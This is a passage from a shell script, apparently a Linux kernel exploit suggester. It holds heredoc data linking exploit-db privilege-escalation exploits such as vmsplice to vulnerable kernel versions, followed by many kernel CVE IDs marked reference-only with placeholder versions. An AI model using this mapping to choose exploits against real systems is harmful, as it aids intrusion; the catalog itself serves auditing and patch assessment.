http://www.exploit-db.com/exploits/15024 1369 vmsplice1 2008-0600 2.6.17,2.6.18,2.6.19,2.6.20,2.6.21,2.6.22,2.6.23,2.6.24,2.6.24.1 jessica biel http://www.exploit-db.com/exploits/5092 1370 vmsplice2 2008-0600 2.6.23,2.6.24 diane_lane http://www.exploit-db.com/exploits/5093 1371 w00t 2.4.10,2.4.16,2.4.17,2.4.18,2.4.19,2.4.20,2.4.21 1372 CVE-2004-0186 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1373 CVE-2007-4573 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1374 CVE-2008-0009 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1375 CVE-2008-0010 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1376 CVE-2009-0065 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1377 CVE-2009-1046 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1378 CVE-2009-1185 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1379 CVE-2009-1897 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1380 CVE-2009-2910 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1381 CVE-2009-3001 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1382 CVE-2010-0832 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1383 CVE-2010-2240 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1384 CVE-2010-2963 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1385 CVE-2010-4170 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1386 EOF_DATA_7 1387 )" 1388 KERNEL_CVE_DATA_8="$(cat <<'EOF_DATA_8' 1389 CVE-2010-4258 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1390 CVE-2011-1485 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1391 CVE-2011-1493 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1392 CVE-2011-2921 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1393 CVE-2012-0809 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1394 CVE-2013-1763 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1395 CVE-2014-0476 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1396 CVE-2014-3153 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1397 CVE-2014-4322 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1398 CVE-2014-5119 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1399 CVE-2014-9322 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1400 CVE-2015-0568 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1401 CVE-2015-0570 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1402 CVE-2015-1318 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1403 CVE-2015-1805 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1404 CVE-2015-1815 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1405 CVE-2015-1862 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1406 CVE-2015-3202 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1407 CVE-2015-3246 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1408 CVE-2015-3315 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1409 CVE-2015-3636 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1410 CVE-2015-5287 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1411 CVE-2015-6565 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1412 CVE-2015-8612 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1413 CVE-2016-0819 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1414 EOF_DATA_8 1415 )" 1416 KERNEL_CVE_DATA_9="$(cat <<'EOF_DATA_9' 1417 CVE-2016-0820 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1418 CVE-2016-10277 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1419 CVE-2016-1240 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1420 CVE-2016-1247 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1421 CVE-2016-1531 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1422 CVE-2016-1583 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1423 CVE-2016-2059 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1424 CVE-2016-2411 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1425 CVE-2016-2434 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1426 CVE-2016-2435 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1427 CVE-2016-2475 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1428 CVE-2016-2503 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1429 CVE-2016-3857 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1430 CVE-2016-3873 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1431 CVE-2016-4989 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1432 CVE-2016-5340 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1433 CVE-2016-5425 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1434 CVE-2016-6187 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1435 CVE-2016-6662 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1436 CVE-2016-6663 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1437 CVE-2016-6664 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1438 CVE-2016-6787 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1439 CVE-2016-7117 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1440 CVE-2016-8453 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1441 CVE-2016-8633 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1442 EOF_DATA_9 1443 )" 1444 KERNEL_CVE_DATA_10="$(cat <<'EOF_DATA_10' 1445 CVE-2016-9566 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1446 CVE-2017-0358 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1447 CVE-2017-0403 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1448 CVE-2017-0437 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1449 CVE-2017-0569 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1450 CVE-2017-1000251 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1451 CVE-2017-1000363 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1452 CVE-2017-1000366 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1453 CVE-2017-1000367 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1454 CVE-2017-1000370 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1455 CVE-2017-1000371 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1456 CVE-2017-1000379 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1457 CVE-2017-1000380 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1458 CVE-2017-1000405 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1459 CVE-2017-10661 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1460 CVE-2017-11176 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1461 CVE-2017-16695 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1462 CVE-2017-18344 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1463 CVE-2017-2636 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1464 CVE-2017-5123 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1465 CVE-2017-5618 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1466 CVE-2017-5899 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1467 CVE-2017-7184 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1468 CVE-2017-7616 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1469 CVE-2018-1000001 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1470 EOF_DATA_10 1471 )" 1472 KERNEL_CVE_DATA_11="$(cat <<'EOF_DATA_11' 1473 CVE-2018-10900 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1474 CVE-2018-14665 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1475 CVE-2018-17182 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1476 CVE-2018-18281 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1477 CVE-2018-3639 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1478 CVE-2018-6554 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1479 CVE-2018-6555 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1480 CVE-2018-8781 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1481 CVE-2018-9568 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1482 CVE-2019-10149 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1483 CVE-2019-10567 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1484 CVE-2019-11190 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1485 CVE-2019-12181 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1486 CVE-2019-14040 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1487 CVE-2019-14041 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1488 CVE-2019-16508 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1489 CVE-2019-18634 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1490 CVE-2019-18675 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1491 CVE-2019-18683 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1492 CVE-2019-18862 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1493 CVE-2019-19377 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1494 CVE-2019-2000 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1495 CVE-2019-2025 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1496 CVE-2019-2181 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1497 CVE-2019-2214 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1498 EOF_DATA_11 1499 )" 1500 KERNEL_CVE_DATA_12="$(cat <<'EOF_DATA_12' 1501 CVE-2019-2215 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1502 CVE-2019-7304 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1503 CVE-2019-7308 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1504 CVE-2019-9213 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1505 CVE-2019-9500 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1506 CVE-2019-9503 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1507 CVE-2020-0041 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1508 CVE-2020-0423 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1509 CVE-2020-11179 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1510 CVE-2020-12351 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1511 CVE-2020-12352 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1512 CVE-2020-14356 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1513 CVE-2020-14381 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1514 CVE-2020-14386 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1515 CVE-2020-16119 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1516 CVE-2020-24490 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1517 CVE-2020-25220 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1518 CVE-2020-27194 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1519 CVE-2020-27786 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1520 CVE-2020-28343 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1521 CVE-2020-28588 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1522 CVE-2020-3680 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1523 CVE-2020-8835 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1524 CVE-2020-9470 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1525 CVE-2021-0399 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1526 EOF_DATA_12 1527 )" 1528 KERNEL_CVE_DATA_13="$(cat <<'EOF_DATA_13' 1529 CVE-2021-0920 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1530 CVE-2021-1048 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1531 CVE-2021-1905 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1532 CVE-2021-1940 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1533 CVE-2021-1961 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1534 CVE-2021-1968 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1535 CVE-2021-1969 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1536 CVE-2021-20226 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1537 CVE-2021-23134 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1538 CVE-2021-25369 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1539 CVE-2021-25370 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1540 CVE-2021-26341 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1541 CVE-2021-26708 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1542 CVE-2021-27363 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1543 CVE-2021-27364 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1544 CVE-2021-28663 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1545 CVE-2021-28664 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1546 CVE-2021-29657 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1547 CVE-2021-3156 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1548 CVE-2021-32606 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1549 CVE-2021-33909 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1550 CVE-2021-34866 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1551 CVE-2021-3492 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1552 CVE-2021-3573 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1553 CVE-2021-3609 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1554 EOF_DATA_13 1555 )" 1556 KERNEL_CVE_DATA_14="$(cat <<'EOF_DATA_14' 1557 CVE-2021-3715 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1558 CVE-2021-39793 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1559 CVE-2021-39815 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1560 CVE-2021-4034 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1561 CVE-2021-41073 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1562 CVE-2021-42008 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1563 CVE-2021-4204 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1564 CVE-2021-42327 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1565 CVE-2021-43267 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1566 CVE-2021-4440 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1567 CVE-2021-44733 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1568 CVE-2021-45608 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1569 CVE-2022-0185 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1570 CVE-2022-0435 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1571 CVE-2022-1015 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1572 CVE-2022-1016 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1573 CVE-2022-1786 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1574 CVE-2022-1972 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1575 CVE-2022-20122 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1576 CVE-2022-20186 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1577 CVE-2022-20409 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1578 CVE-2022-20421 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1579 CVE-2022-2078 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1580 CVE-2022-22057 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1581 CVE-2022-22071 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1582 EOF_DATA_14 1583 )" 1584 KERNEL_CVE_DATA_15="$(cat <<'EOF_DATA_15' 1585 CVE-2022-22265 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1586 CVE-2022-22706 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1587 CVE-2022-23222 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1588 CVE-2022-24354 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1589 CVE-2022-25636 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1590 CVE-2022-25664 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1591 CVE-2022-2590 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1592 CVE-2022-2602 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1593 CVE-2022-27666 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1594 CVE-2022-29582 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1595 CVE-2022-34918 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1596 CVE-2022-38181 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1597 CVE-2022-3910 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1598 CVE-2022-41218 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1599 CVE-2022-42703 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1600 CVE-2022-42895 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1601 CVE-2022-42896 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1602 CVE-2022-4543 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1603 CVE-2022-46395 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1604 CVE-2022-47943 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1605 CVE-2022-49080 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1606 CVE-2023-0179 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1607 CVE-2023-0266 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1608 CVE-2023-0461 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1609 CVE-2023-0590 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1610 EOF_DATA_15 1611 )" 1612 KERNEL_CVE_DATA_16="$(cat <<'EOF_DATA_16' 1613 CVE-2023-1206 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1614 CVE-2023-1829 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1615 CVE-2023-2008 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1616 CVE-2023-20938 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1617 CVE-2023-21400 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1618 CVE-2023-2156 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1619 CVE-2023-2163 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1620 CVE-2023-23586 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1621 CVE-2023-2593 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1622 CVE-2023-2598 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1623 CVE-2023-26083 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1624 CVE-2023-2612 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1625 CVE-2023-2640 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1626 CVE-2023-31248 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1627 CVE-2023-32233 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1628 CVE-2023-32629 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1629 CVE-2023-3269 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1630 CVE-2023-32832 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1631 CVE-2023-32837 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source suggesters 1632 CVE-2023-32878 catalog_reference_only 9999.9999.9999 0 Reference-only CVE token from example repos; no matching rule defined in source 